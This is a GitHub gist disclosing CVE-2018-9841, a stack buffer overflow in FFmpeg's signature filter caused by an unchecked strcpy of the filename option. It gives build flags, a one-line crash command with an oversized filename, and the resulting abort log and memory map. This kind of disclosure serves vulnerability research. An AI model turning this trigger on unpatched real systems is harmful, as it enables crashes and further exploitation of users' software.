Skip to content

Instantly share code, notes, and snippets.

@0xKira

0xKira/FFmpeg Stack Overflow.md

Last active August 17, 2020 09:27
Show Gist options
  • Save 0xKira/48083a339ec471cb81777c19b86ed82e to your computer and use it in GitHub Desktop.
Save 0xKira/48083a339ec471cb81777c19b86ed82e to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2018-9841
Raw
FFmpeg Stack Overflow.md

vulnerable function:

export from libavfilter/vf_signature.c

static int export(AVFilterContext *ctx, StreamContext *sc, int input)
{
    SignatureContext* sic = ctx->priv;
    char filename[1024];

    if (sic->nb_inputs > 1) {
        /* error already handled */
        av_assert0(av_get_frame_filename(filename, sizeof(filename), sic->filename, input) == 0);
    } else {
        strcpy(filename, sic->filename);
    }
    if (sic->format == FORMAT_XML) {
        return xml_export(ctx, sc, filename);
    } else {
        return binary_export(ctx, sc, filename);
    }
}

line 579:

strcpy(filename, sic->filename);

Please notice the strcpy function call. It's a dangerous function so it seems a stack overflow vulnerability here.

Let's prove it.

  1. Compile the ffmpeg

    ./configure --disable-x86asm --disable-ffplay --disable-ffprobe --disable-doc --enable-gpl --enable-filter=signature
make clean && make -j8

  2. Stack overflow!

    ./ffmpeg -i /path/to/video -vf signature=filename=`python -c "print 'A' * 0x1000"` -map 0:v -f null -

    The error is shown

    ffmpeg version N-90480-ge5819fa Copyright (c) 2000-2018 the FFmpeg developers
  built with gcc 5.4.0 (Ubuntu 5.4.0-6ubuntu1~16.04.9) 20160609
  configuration: --disable-x86asm --disable-ffplay --disable-ffprobe --disable-doc --enable-gpl --enable-filter=signature
  libavutil      56. 12.100 / 56. 12.100
  libavcodec     58. 16.100 / 58. 16.100
  libavformat    58. 10.100 / 58. 10.100
  libavdevice    58.  2.100 / 58.  2.100
  libavfilter     7. 13.100 /  7. 13.100
  libswscale      5.  0.102 /  5.  0.102
  libswresample   3.  0.101 /  3.  0.101
  libpostproc    55.  0.100 / 55.  0.100
Input #0, matroska,webm, from '/home/kira/fuzzdata/samples/mkv/9bitwhite.mkv':
  Metadata:
    encoder         : Haali Matroska Writer b0
  Duration: 00:00:09.97, start: 0.000000, bitrate: 230 kb/s
    Stream #0:0(eng): Video: h264 (High 10), yuv420p9le(progressive), 720x480, SAR 1:1 DAR 3:2, 23.98 fps, 23.98 tbr, 20k tbn, 40k tbc (default)
Stream mapping:
  Stream #0:0 -> #0:0 (h264 (native) -> wrapped_avframe (native))
Press [q] to stop, [?] for help
Output #0, null, to 'pipe:':
  Metadata:
    encoder         : Lavf58.10.100
    Stream #0:0(eng): Video: wrapped_avframe, yuv420p, 720x480 [SAR 1:1 DAR 3:2], q=2-31, 200 kb/s, 23.98 fps, 23.98 tbn, 23.98 tbc (default)
    Metadata:
      encoder         : Lavc58.16.100 wrapped_avframe
*** buffer overflow detected ***: ./ffmpeg terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fde69d837e5]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7fde69e2515c]
/lib/x86_64-linux-gnu/libc.so.6(+0x117160)[0x7fde69e23160]
/lib/x86_64-linux-gnu/libc.so.6(+0x1164b2)[0x7fde69e224b2]
./ffmpeg[0x56dc91]
./ffmpeg[0x56e97a]
./ffmpeg[0x4b70fe]
./ffmpeg[0x4b9fef]
./ffmpeg[0x4bede4]
./ffmpeg[0x48dfa5]
./ffmpeg[0x49a47c]
./ffmpeg(main+0x1027)[0x476b37]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fde69d2c830]
./ffmpeg[0x478789]
======= Memory map: ========
00400000-013db000 r-xp 00000000 fd:00 42241910                           /home/kira/fuzz/ffmpeg/ffmpeg
015da000-015db000 r--p 00fda000 fd:00 42241910                           /home/kira/fuzz/ffmpeg/ffmpeg
015db000-01626000 rw-p 00fdb000 fd:00 42241910                           /home/kira/fuzz/ffmpeg/ffmpeg
01626000-01e10000 rw-p 00000000 00:00 0
031e1000-035b5000 rw-p 00000000 00:00 0                                  [heap]
7fde37ff8000-7fde37ff9000 ---p 00000000 00:00 0
7fde37ff9000-7fde387f9000 rw-p 00000000 00:00 0
7fde387f9000-7fde387fa000 ---p 00000000 00:00 0
7fde387fa000-7fde38ffa000 rw-p 00000000 00:00 0
7fde38ffa000-7fde38ffb000 ---p 00000000 00:00 0
7fde38ffb000-7fde397fb000 rw-p 00000000 00:00 0
7fde397fb000-7fde397fc000 ---p 00000000 00:00 0
7fde397fc000-7fde39ffc000 rw-p 00000000 00:00 0
7fde39ffc000-7fde39ffd000 ---p 00000000 00:00 0
7fde39ffd000-7fde3a7fd000 rw-p 00000000 00:00 0
7fde3a7fd000-7fde3a7fe000 ---p 00000000 00:00 0
7fde3a7fe000-7fde3affe000 rw-p 00000000 00:00 0
7fde3affe000-7fde3afff000 ---p 00000000 00:00 0
7fde3afff000-7fde3b7ff000 rw-p 00000000 00:00 0
7fde3b7ff000-7fde3b800000 ---p 00000000 00:00 0
7fde3b800000-7fde3c000000 rw-p 00000000 00:00 0
7fde3c000000-7fde3c46e000 rw-p 00000000 00:00 0
7fde3c46e000-7fde40000000 ---p 00000000 00:00 0
7fde40000000-7fde4027f000 rw-p 00000000 00:00 0
7fde4027f000-7fde44000000 ---p 00000000 00:00 0
7fde44000000-7fde4446e000 rw-p 00000000 00:00 0
7fde4446e000-7fde48000000 ---p 00000000 00:00 0
7fde48000000-7fde4846e000 rw-p 00000000 00:00 0
7fde4846e000-7fde4c000000 ---p 00000000 00:00 0
7fde4c000000-7fde4c390000 rw-p 00000000 00:00 0
7fde4c390000-7fde50000000 ---p 00000000 00:00 0
7fde50000000-7fde5046f000 rw-p 00000000 00:00 0
7fde5046f000-7fde54000000 ---p 00000000 00:00 0
7fde54000000-7fde5446f000 rw-p 00000000 00:00 0
7fde5446f000-7fde58000000 ---p 00000000 00:00 0
7fde58000000-7fde5849e000 rw-p 00000000 00:00 0
7fde5849e000-7fde5c000000 ---p 00000000 00:00 0
7fde5c000000-7fde5c5a3000 rw-p 00000000 00:00 0
7fde5c5a3000-7fde60000000 ---p 00000000 00:00 0
7fde60556000-7fde6056c000 r-xp 00000000 fd:00 1315288                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fde6056c000-7fde6076b000 ---p 00016000 fd:00 1315288                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fde6076b000-7fde6076c000 rw-p 00015000 fd:00 1315288                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fde6076c000-7fde6076d000 ---p 00000000 00:00 0
7fde6076d000-7fde60f6d000 rw-p 00000000 00:00 0
7fde60f6d000-7fde60f6e000 ---p 00000000 00:00 0
7fde60f6e000-7fde6176e000 rw-p 00000000 00:00 0
7fde6176e000-7fde6176f000 ---p 00000000 00:00 0
7fde6176f000-7fde61f6f000 rw-p 00000000 00:00 0
7fde61f6f000-7fde61f70000 ---p 00000000 00:00 0
7fde61f70000-7fde62770000 rw-p 00000000 00:00 0
7fde62770000-7fde62771000 ---p 00000000 00:00 0
7fde62771000-7fde62f71000 rw-p 00000000 00:00 0
7fde62f71000-7fde62f72000 ---p 00000000 00:00 0
7fde62f72000-7fde63772000 rw-p 00000000 00:00 0
7fde63772000-7fde63773000 ---p 00000000 00:00 0
7fde63773000-7fde63f73000 rw-p 00000000 00:00 0
7fde63f73000-7fde63f74000 ---p 00000000 00:00 0
7fde63f74000-7fde64774000 rw-p 00000000 00:00 0
7fde64774000-7fde64775000 ---p 00000000 00:00 0
7fde64775000-7fde64f75000 rw-p 00000000 00:00 0
7fde64f75000-7fde64f9f000 r-xp 00000000 fd:00 11012122                   /usr/lib/x86_64-linux-gnu/libvorbis.so.0.4.8
7fde64f9f000-7fde6519e000 ---p 0002a000 fd:00 11012122                   /usr/lib/x86_64-linux-gnu/libvorbis.so.0.4.8
7fde6519e000-7fde6519f000 r--p 00029000 fd:00 11012122                   /usr/lib/x86_64-linux-gnu/libvorbis.so.0.4.8
7fde6519f000-7fde651a0000 rw-p 0002a000 fd:00 11012122                   /usr/lib/x86_64-linux-gnu/libvorbis.so.0.4.8
7fde651a0000-7fde651a7000 r-xp 00000000 fd:00 11018827                   /usr/lib/x86_64-linux-gnu/libogg.so.0.8.2
7fde651a7000-7fde653a7000 ---p 00007000 fd:00 11018827                   /usr/lib/x86_64-linux-gnu/libogg.so.0.8.2
7fde653a7000-7fde653a8000 r--p 00007000 fd:00 11018827                   /usr/lib/x86_64-linux-gnu/libogg.so.0.8.2
7fde653a8000-7fde653a9000 rw-p 00008000 fd:00 11018827                   /usr/lib/x86_64-linux-gnu/libogg.so.0.8.2
7fde653a9000-7fde653bb000 r-xp 00000000 fd:00 1315294                    /lib/x86_64-linux-gnu/libgpg-error.so.0.17.0
7fde653bb000-7fde655bb000 ---p 00012000 fd:00 1315294                    /lib/x86_64-linux-gnu/libgpg-error.so.0.17.0
7fde655bb000-7fde655bc000 r--p 00012000 fd:00 1315294                    /lib/x86_64-linux-gnu/libgpg-error.so.0.17.0
7fde655bc000-7fde655bd000 rw-p 00013000 fd:00 1315294                    /lib/x86_64-linux-gnu/libgpg-error.so.0.17.0
7fde655bd000-7fde6562b000 r-xp 00000000 fd:00 1315379                    /lib/x86_64-linux-gnu/libpcre.so.3.13.2
7fde6562b000-7fde6582b000 ---p 0006e000 fd:00 1315379                    /lib/x86_64-linux-gnu/libpcre.so.3.13.2
7fde6582b000-7fde6582c000 r--p 0006e000 fd:00 1315379                    /lib/x86_64-linux-gnu/libpcre.so.3.13.2
7fde6582c000-7fde6582d000 rw-p 0006f000 fd:00 1315379                    /lib/x86_64-linux-gnu/libpcre.so.3.13.2
7fde6582d000-7fde65844000 r-xp 00000000 fd:00 1311039                    /lib/x86_64-linux-gnu/libresolv-2.23.so
7fde65844000-7fde65a44000 ---p 00017000 fd:00 1311039                    /lib/x86_64-linux-gnu/libresolv-2.23.so
7fde65a44000-7fde65a45000 r--p 00017000 fd:00 1311039                    /lib/x86_64-linux-gnu/libresolv-2.23.so
7fde65a45000-7fde65a46000 rw-p 00018000 fd:00 1311039                    /lib/x86_64-linux-gnu/libresolv-2.23.so
7fde65a46000-7fde65a48000 rw-p 00000000 00:00 0
7fde65a48000-7fde65ad5000 r-xp 00000000 fd:00 11012120                   /usr/lib/x86_64-linux-gnu/libvorbisenc.so.2.0.11
7fde65ad5000-7fde65cd4000 ---p 0008d000 fd:00 11012120                   /usr/lib/x86_64-linux-gnu/libvorbisenc.so.2.0.11
7fde65cd4000-7fde65cf0000 r--p 0008c000 fd:00 11012120                   /usr/lib/x86_64-linux-gnu/libvorbisenc.so.2.0.11
7fde65cf0000-7fde65cf1000 rw-p 000a8000 fd:00 11012120                   /usr/lib/x86_64-linux-gnu/libvorbisenc.so.2.0.11
7fde65cf1000-7fde65d64000 r-xp 00000000 fd:00 11017744                   /usr/lib/x86_64-linux-gnu/libFLAC.so.8.3.0
7fde65d64000-7fde65f64000 ---p 00073000 fd:00 11017744                   /usr/lib/x86_64-linux-gnu/libFLAC.so.8.3.0
7fde65f64000-7fde65f65000 r--p 00073000 fd:00 11017744                   /usr/lib/x86_64-linux-gnu/libFLAC.so.8.3.0
7fde65f65000-7fde65f66000 rw-p 00074000 fd:00 11017744                   /usr/lib/x86_64-linux-gnu/libFLAC.so.8.3.0
7fde65f66000-7fde65f7c000 r-xp 00000000 fd:00 1311032                    /lib/x86_64-linux-gnu/libnsl-2.23.so
7fde65f7c000-7fde6617b000 ---p 00016000 fd:00 1311032                    /lib/x86_64-linux-gnu/libnsl-2.23.so
7fde6617b000-7fde6617c000 r--p 00015000 fd:00 1311032                    /lib/x86_64-linux-gnu/libnsl-2.23.so
7fde6617c000-7fde6617d000 rw-p 00016000 fd:00 1311032                    /lib/x86_64-linux-gnu/libnsl-2.23.so
7fde6617d000-7fde6617f000 rw-p 00000000 00:00 0
7fde6617f000-7fde66256000 r-xp 00000000 fd:00 1311189                    /lib/x86_64-linux-gnu/libgcrypt.so.20.0.5
7fde66256000-7fde66456000 ---p 000d7000 fd:00 1311189                    /lib/x86_64-linux-gnu/libgcrypt.so.20.0.5
7fde66456000-7fde66457000 r--p 000d7000 fd:00 1311189                    /lib/x86_64-linux-gnu/libgcrypt.so.20.0.5
7fde66457000-7fde6645f000 rw-p 000d8000 fd:00 1311189                    /lib/x86_64-linux-gnu/libgcrypt.so.20.0.5
7fde6645f000-7fde66460000 rw-p 00000000 00:00 0
7fde66460000-7fde66481000 r-xp 00000000 fd:00 1315317                    /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fde66481000-7fde66680000 ---p 00021000 fd:00 1315317                    /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fde66680000-7fde66681000 r--p 00020000 fd:00 1315317                    /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fde66681000-7fde66682000 rw-p 00021000 fd:00 1315317                    /lib/x86_64-linux-gnu/liblzma.so.5.0.0
7fde66682000-7fde666a1000 r-xp 00000000 fd:00 1315408                    /lib/x86_64-linux-gnu/libselinux.so.1
7fde666a1000-7fde668a0000 ---p 0001f000 fd:00 1315408                    /lib/x86_64-linux-gnu/libselinux.so.1
7fde668a0000-7fde668a1000 r--p 0001e000 fd:00 1315408                    /lib/x86_64-linux-gnu/libselinux.so.1
7fde668a1000-7fde668a2000 rw-p 0001f000 fd:00 1315408                    /lib/x86_64-linux-gnu/libselinux.so.1
7fde668a2000-7fde668a4000 rw-p 00000000 00:00 0
7fde668a4000-7fde668a9000 r-xp 00000000 fd:00 11017998                   /usr/lib/x86_64-linux-gnu/libasyncns.so.0.3.1
7fde668a9000-7fde66aa8000 ---p 00005000 fd:00 11017998                   /usr/lib/x86_64-linux-gnu/libasyncns.so.0.3.1
7fde66aa8000-7fde66aa9000 r--p 00004000 fd:00 11017998                   /usr/lib/x86_64-linux-gnu/libasyncns.so.0.3.1
7fde66aa9000-7fde66aaa000 rw-p 00005000 fd:00 11017998                   /usr/lib/x86_64-linux-gnu/libasyncns.so.0.3.1
7fde66aaa000-7fde66b0c000 r-xp 00000000 fd:00 11019035                   /usr/lib/x86_64-linux-gnu/libsndfile.so.1.0.25
7fde66b0c000-7fde66d0c000 ---p 00062000 fd:00 11019035                   /usr/lib/x86_64-linux-gnu/libsndfile.so.1.0.25
7fde66d0c000-7fde66d0e000 r--p 00062000 fd:00 11019035                   /usr/lib/x86_64-linux-gnu/libsndfile.so.1.0.25
7fde66d0e000-7fde66d0f000 rw-p 00064000 fd:00 11019035                   /usr/lib/x86_64-linux-gnu/libsndfile.so.1.0.25
7fde66d0f000-7fde66d13000 rw-p 00000000 00:00 0
7fde66d13000-7fde66d1b000 r-xp 00000000 fd:00 1315436                    /lib/x86_64-linux-gnu/libwrap.so.0.7.6
7fde66d1b000-7fde66f1a000 ---p 00008000 fd:00 1315436                    /lib/x86_64-linux-gnu/libwrap.so.0.7.6
7fde66f1a000-7fde66f1b000 r--p 00007000 fd:00 1315436                    /lib/x86_64-linux-gnu/libwrap.so.0.7.6
7fde66f1b000-7fde66f1c000 rw-p 00008000 fd:00 1315436                    /lib/x86_64-linux-gnu/libwrap.so.0.7.6
7fde66f1c000-7fde66f1d000 rw-p 00000000 00:00 0
7fde66f1d000-7fde66f24000 r-xp 00000000 fd:00 11018284                   /usr/lib/x86_64-linux-gnu/libffi.so.6.0.4
7fde66f24000-7fde67123000 ---p 00007000 fd:00 11018284                   /usr/lib/x86_64-linux-gnu/libffi.so.6.0.4
7fde67123000-7fde67124000 r--p 00006000 fd:00 11018284                   /usr/lib/x86_64-linux-gnu/libffi.so.6.0.4
7fde67124000-7fde67125000 rw-p 00007000 fd:00 11018284                   /usr/lib/x86_64-linux-gnu/libffi.so.6.0.4
7fde67125000-7fde6712a000 r-xp 00000000 fd:00 11017909                   /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0
7fde6712a000-7fde67329000 ---p 00005000 fd:00 11017909                   /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0
7fde67329000-7fde6732a000 r--p 00004000 fd:00 11017909                   /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0
7fde6732a000-7fde6732b000 rw-p 00005000 fd:00 11017909                   /usr/lib/x86_64-linux-gnu/libXfixes.so.3.1.0
7fde6732b000-7fde67334000 r-xp 00000000 fd:00 11017929                   /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0
7fde67334000-7fde67533000 ---p 00009000 fd:00 11017929                   /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0
7fde67533000-7fde67534000 r--p 00008000 fd:00 11017929                   /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0
7fde67534000-7fde67535000 rw-p 00009000 fd:00 11017929                   /usr/lib/x86_64-linux-gnu/libXrender.so.1.3.0
7fde67535000-7fde6757f000 r-xp 00000000 fd:00 1315266                    /lib/x86_64-linux-gnu/libdbus-1.so.3.14.6
7fde6757f000-7fde6777f000 ---p 0004a000 fd:00 1315266                    /lib/x86_64-linux-gnu/libdbus-1.so.3.14.6
7fde6777f000-7fde67780000 r--p 0004a000 fd:00 1315266                    /lib/x86_64-linux-gnu/libdbus-1.so.3.14.6
7fde67780000-7fde67781000 rw-p 0004b000 fd:00 1315266                    /lib/x86_64-linux-gnu/libdbus-1.so.3.14.6
7fde67781000-7fde677fb000 r-xp 00000000 fd:00 11273168                   /usr/lib/x86_64-linux-gnu/pulseaudio/libpulsecommon-8.0.so
7fde677fb000-7fde679fa000 ---p 0007a000 fd:00 11273168                   /usr/lib/x86_64-linux-gnu/pulseaudio/libpulsecommon-8.0.so
7fde679fa000-7fde679fb000 r--p 00079000 fd:00 11273168                   /usr/lib/x86_64-linux-gnu/pulseaudio/libpulsecommon-8.0.so
7fde679fb000-7fde679fc000 rw-p 0007a000 fd:00 11273168                   /usr/lib/x86_64-linux-gnu/pulseaudio/libpulsecommon-8.0.so
7fde679fc000-7fde67a06000 r-xp 00000000 fd:00 1315309                    /lib/x86_64-linux-gnu/libjson-c.so.2.0.0
7fde67a06000-7fde67c05000 ---p 0000a000 fd:00 1315309                    /lib/x86_64-linux-gnu/libjson-c.so.2.0.0
7fde67c05000-7fde67c06000 r--p 00009000 fd:00 1315309                    /lib/x86_64-linux-gnu/libjson-c.so.2.0.0
7fde67c06000-7fde67c07000 rw-p 0000a000 fd:00 1315309                    /lib/x86_64-linux-gnu/libjson-c.so.2.0.0
7fde67c07000-7fde67c1a000 r-xp 00000000 fd:00 1315246                    /lib/x86_64-linux-gnu/libbsd.so.0.8.2
7fde67c1a000-7fde67e19000 ---p 00013000 fd:00 1315246                    /lib/x86_64-linux-gnu/libbsd.so.0.8.2
7fde67e19000-7fde67e1a000 r--p 00012000 fd:00 1315246                    /lib/x86_64-linux-gnu/libbsd.so.0.8.2
7fde67e1a000-7fde67e1b000 rw-p 00013000 fd:00 1315246                    /lib/x86_64-linux-gnu/libbsd.so.0.8.2
7fde67e1b000-7fde67e1c000 rw-p 00000000 00:00 0
7fde67e1c000-7fde67e59000 r-xp 00000000 fd:00 11019316                   /usr/lib/x86_64-linux-gnu/libxkbcommon.so.0.0.0
7fde67e59000-7fde68058000 ---p 0003d000 fd:00 11019316                   /usr/lib/x86_64-linux-gnu/libxkbcommon.so.0.0.0
7fde68058000-7fde6805a000 r--p 0003c000 fd:00 11019316                   /usr/lib/x86_64-linux-gnu/libxkbcommon.so.0.0.0
7fde6805a000-7fde6805b000 rw-p 0003e000 fd:00 11019316                   /usr/lib/x86_64-linux-gnu/libxkbcommon.so.0.0.0
7fde6805b000-7fde6805f000 r-xp 00000000 fd:00 11013284                   /usr/lib/x86_64-linux-gnu/libwayland-cursor.so.0.0.0
7fde6805f000-7fde6825e000 ---p 00004000 fd:00 11013284                   /usr/lib/x86_64-linux-gnu/libwayland-cursor.so.0.0.0
7fde6825e000-7fde6825f000 r--p 00003000 fd:00 11013284                   /usr/lib/x86_64-linux-gnu/libwayland-cursor.so.0.0.0
7fde6825f000-7fde68263000 rw-p 00004000 fd:00 11013284                   /usr/lib/x86_64-linux-gnu/libwayland-cursor.so.0.0.0
7fde68263000-7fde6826f000 r-xp 00000000 fd:00 11018148                   /usr/lib/x86_64-linux-gnu/libwayland-client.so.0.3.0
7fde6826f000-7fde6846f000 ---p 0000c000 fd:00 11018148                   /usr/lib/x86_64-linux-gnu/libwayland-client.so.0.3.0
7fde6846f000-7fde68471000 r--p 0000c000 fd:00 11018148                   /usr/lib/x86_64-linux-gnu/libwayland-client.so.0.3.0
7fde68471000-7fde68472000 rw-p 0000e000 fd:00 11018148                   /usr/lib/x86_64-linux-gnu/libwayland-client.so.0.3.0
7fde68472000-7fde68473000 r-xp 00000000 fd:00 11010945                   /usr/lib/x86_64-linux-gnu/libwayland-egl.so.1.0.0
7fde68473000-7fde68672000 ---p 00001000 fd:00 11010945                   /usr/lib/x86_64-linux-gnu/libwayland-egl.so.1.0.0
7fde68672000-7fde68673000 r--p 00000000 fd:00 11010945                   /usr/lib/x86_64-linux-gnu/libwayland-egl.so.1.0.0
7fde68673000-7fde68674000 rw-p 00001000 fd:00 11010945                   /usr/lib/x86_64-linux-gnu/libwayland-egl.so.1.0.0
7fde68674000-7fde68679000 r-xp 00000000 fd:00 11017945                   /usr/lib/x86_64-linux-gnu/libXxf86vm.so.1.0.0
7fde68679000-7fde68878000 ---p 00005000 fd:00 11017945                   /usr/lib/x86_64-linux-gnu/libXxf86vm.so.1.0.0
7fde68878000-7fde68879000 r--p 00004000 fd:00 11017945                   /usr/lib/x86_64-linux-gnu/libXxf86vm.so.1.0.0
7fde68879000-7fde6887a000 rw-p 00005000 fd:00 11017945                   /usr/lib/x86_64-linux-gnu/libXxf86vm.so.1.0.0
7fde6887a000-7fde6887c000 r-xp 00000000 fd:00 11017931                   /usr/lib/x86_64-linux-gnu/libXss.so.1.0.0
7fde6887c000-7fde68a7c000 ---p 00002000 fd:00 11017931                   /usr/lib/x86_64-linux-gnu/libXss.so.1.0.0
7fde68a7c000-7fde68a7d000 r--p 00002000 fd:00 11017931                   /usr/lib/x86_64-linux-gnu/libXss.so.1.0.0
7fde68a7d000-7fde68a7e000 rw-p 00003000 fd:00 11017931                   /usr/lib/x86_64-linux-gnu/libXss.so.1.0.0
7fde68a7e000-7fde68a88000 r-xp 00000000 fd:00 11017927                   /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0
7fde68a88000-7fde68c87000 ---p 0000a000 fd:00 11017927                   /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0
7fde68c87000-7fde68c88000 r--p 00009000 fd:00 11017927                   /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0
7fde68c88000-7fde68c89000 rw-p 0000a000 fd:00 11017927                   /usr/lib/x86_64-linux-gnu/libXrandr.so.2.2.0
7fde68c89000-7fde68c98000 r-xp 00000000 fd:00 11017917                   /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0
7fde68c98000-7fde68e97000 ---p 0000f000 fd:00 11017917                   /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0
7fde68e97000-7fde68e98000 r--p 0000e000 fd:00 11017917                   /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0
7fde68e98000-7fde68e99000 rw-p 0000f000 fd:00 11017917                   /usr/lib/x86_64-linux-gnu/libXi.so.6.1.0
7fde68e99000-7fde68e9b000 r-xp 00000000 fd:00 11017919                   /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7fde68e9b000-7fde6909a000 ---p 00002000 fd:00 11017919                   /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7fde6909a000-7fde6909b000 r--p 00001000 fd:00 11017919                   /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7fde6909b000-7fde6909c000 rw-p 00002000 fd:00 11017919                   /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
7fde6909c000-7fde690a5000 r-xp 00000000 fd:00 11010310                   /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2
7fde690a5000-7fde692a4000 ---p 00009000 fd:00 11010310                   /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2
7fde692a4000-7fde692a5000 r--p 00008000 fd:00 11010310                   /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2
7fde692a5000-7fde692a6000 rw-p 00009000 fd:00 11010310                   /usr/lib/x86_64-linux-gnu/libXcursor.so.1.0.2
7fde692a6000-7fde692f4000 r-xp 00000000 fd:00 11013184                   /usr/lib/x86_64-linux-gnu/libpulse.so.0.19.0
7fde692f4000-7fde694f4000 ---p 0004e000 fd:00 11013184                   /usr/lib/x86_64-linux-gnu/libpulse.so.0.19.0
7fde694f4000-7fde694f5000 r--p 0004e000 fd:00 11013184                   /usr/lib/x86_64-linux-gnu/libpulse.so.0.19.0
7fde694f5000-7fde694f6000 rw-p 0004f000 fd:00 11013184                   /usr/lib/x86_64-linux-gnu/libpulse.so.0.19.0
7fde694f6000-7fde694fd000 r-xp 00000000 fd:00 1311053                    /lib/x86_64-linux-gnu/librt-2.23.so
7fde694fd000-7fde696fc000 ---p 00007000 fd:00 1311053                    /lib/x86_64-linux-gnu/librt-2.23.so
7fde696fc000-7fde696fd000 r--p 00006000 fd:00 1311053                    /lib/x86_64-linux-gnu/librt-2.23.so
7fde696fd000-7fde696fe000 rw-p 00007000 fd:00 1311053                    /lib/x86_64-linux-gnu/librt-2.23.so
7fde696fe000-7fde69703000 r-xp 00000000 fd:00 11017905                   /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7fde69703000-7fde69902000 ---p 00005000 fd:00 11017905                   /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7fde69902000-7fde69903000 r--p 00004000 fd:00 11017905                   /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7fde69903000-7fde69904000 rw-p 00005000 fd:00 11017905                   /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
7fde69904000-7fde69906000 r-xp 00000000 fd:00 11017894                   /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7fde69906000-7fde69b06000 ---p 00002000 fd:00 11017894                   /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7fde69b06000-7fde69b07000 r--p 00002000 fd:00 11017894                   /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7fde69b07000-7fde69b08000 rw-p 00003000 fd:00 11017894                   /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
7fde69b08000-7fde69b0b000 r-xp 00000000 fd:00 1311037                    /lib/x86_64-linux-gnu/libdl-2.23.so
7fde69b0b000-7fde69d0a000 ---p 00003000 fd:00 1311037                    /lib/x86_64-linux-gnu/libdl-2.23.so
7fde69d0a000-7fde69d0b000 r--p 00002000 fd:00 1311037                    /lib/x86_64-linux-gnu/libdl-2.23.so
7fde69d0b000-7fde69d0c000 rw-p 00003000 fd:00 1311037                    /lib/x86_64-linux-gnu/libdl-2.23.so
7fde69d0c000-7fde69ecc000 r-xp 00000000 fd:00 1311035                    /lib/x86_64-linux-gnu/libc-2.23.so
7fde69ecc000-7fde6a0cc000 ---p 001c0000 fd:00 1311035                    /lib/x86_64-linux-gnu/libc-2.23.so
7fde6a0cc000-7fde6a0d0000 r--p 001c0000 fd:00 1311035                    /lib/x86_64-linux-gnu/libc-2.23.so
7fde6a0d0000-7fde6a0d2000 rw-p 001c4000 fd:00 1311035                    /lib/x86_64-linux-gnu/libc-2.23.so
7fde6a0d2000-7fde6a0d6000 rw-p 00000000 00:00 0
7fde6a0d6000-7fde6a0ee000 r-xp 00000000 fd:00 1311034                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7fde6a0ee000-7fde6a2ed000 ---p 00018000 fd:00 1311034                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7fde6a2ed000-7fde6a2ee000 r--p 00017000 fd:00 1311034                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7fde6a2ee000-7fde6a2ef000 rw-p 00018000 fd:00 1311034                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7fde6a2ef000-7fde6a2f3000 rw-p 00000000 00:00 0
7fde6a2f3000-7fde6a30c000 r-xp 00000000 fd:00 1315441                    /lib/x86_64-linux-gnu/libz.so.1.2.8
7fde6a30c000-7fde6a50b000 ---p 00019000 fd:00 1315441                    /lib/x86_64-linux-gnu/libz.so.1.2.8
7fde6a50b000-7fde6a50c000 r--p 00018000 fd:00 1315441                    /lib/x86_64-linux-gnu/libz.so.1.2.8
7fde6a50c000-7fde6a50d000 rw-p 00019000 fd:00 1315441                    /lib/x86_64-linux-gnu/libz.so.1.2.8
7fde6a50d000-7fde6a51c000 r-xp 00000000 fd:00 1315249                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fde6a51c000-7fde6a71b000 ---p 0000f000 fd:00 1315249                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fde6a71b000-7fde6a71c000 r--p 0000e000 fd:00 1315249                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fde6a71c000-7fde6a71d000 rw-p 0000f000 fd:00 1315249                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fde6a71d000-7fde6a729000 r-xp 00000000 fd:00 11025315                   /usr/lib/x86_64-linux-gnu/libsndio.so.6.1
7fde6a729000-7fde6a929000 ---p 0000c000 fd:00 11025315                   /usr/lib/x86_64-linux-gnu/libsndio.so.6.1
7fde6a929000-7fde6a92a000 r--p 0000c000 fd:00 11025315                   /usr/lib/x86_64-linux-gnu/libsndio.so.6.1
7fde6a92a000-7fde6a92b000 rw-p 0000d000 fd:00 11025315                   /usr/lib/x86_64-linux-gnu/libsndio.so.6.1
7fde6a92b000-7fde6a92d000 rw-p 00000000 00:00 0
